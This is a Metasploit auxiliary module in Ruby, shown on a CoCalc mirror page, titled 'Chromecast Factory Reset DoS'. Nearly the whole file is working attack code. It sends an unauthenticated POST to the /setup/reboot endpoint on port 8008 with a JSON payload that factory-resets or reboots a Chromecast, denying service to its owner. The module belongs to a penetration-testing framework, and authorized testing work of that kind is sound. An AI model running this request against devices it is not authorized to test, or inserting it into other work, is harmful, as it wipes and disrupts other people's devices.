CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/chromecast/chromecast_reset.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name' => 'Chromecast Factory Reset DoS',

12
      'Description' => %q{

13
        This module performs a factory reset on a Chromecast, causing a denial of service (DoS).

14
        No user authentication is required.

15
      },

16
      'Author' => ['wvu'],

17
      'References' => [

18
        ['URL', 'http://www.google.com/intl/en/chrome/devices/chromecast/index.html'] # vendor website

19
      ],

20
      'License' => MSF_LICENSE,

21
      'Actions' => [

22
        ['Reset', 'Description' => 'Factory reset'],

23
        ['Reboot', 'Description' => 'Reboot only']

24
      ],

25
      'DefaultAction' => 'Reset'

26
    ))

27


28
    register_options([

29
      Opt::RPORT(8008)

30
    ])

31
  end

32


33
  def run

34
    case action.name

35
    when 'Reset'

36
      res = reset

37
    when 'Reboot'

38
      res = reboot

39
    end

40


41
    if res && res.code == 200

42
      print_good("#{action.name} performed")

43
    elsif res

44
      print_error("An error occurred: #{res.code} #{res.message}")

45
    end

46
  end

47


48
  def reset

49
    begin

50
      send_request_raw(

51
        'method' => 'POST',

52
        'uri' => '/setup/reboot',

53
        'agent' => Rex::Text.rand_text_english(rand(42) + 1),

54
        'ctype' => 'application/json',

55
        'data' => '{"params": "fdr"}'

56
      )

57
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,

58
           Rex::HostUnreachable => e

59
      fail_with(Failure::Unreachable, e)

60
    ensure

61
      disconnect

62
    end

63
  end

64


65
  def reboot

66
    begin

67
      send_request_raw(

68
        'method' => 'POST',

69
        'uri' => '/setup/reboot',

70
        'agent' => Rex::Text.rand_text_english(rand(42) + 1),

71
        'ctype' => 'application/json',

72
        'data' => '{"params": "now"}'

73
      )

74
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,

75
           Rex::HostUnreachable => e

76
      fail_with(Failure::Unreachable, e)

77
    ensure

78
      disconnect

79
    end

80
  end

81
end

82


83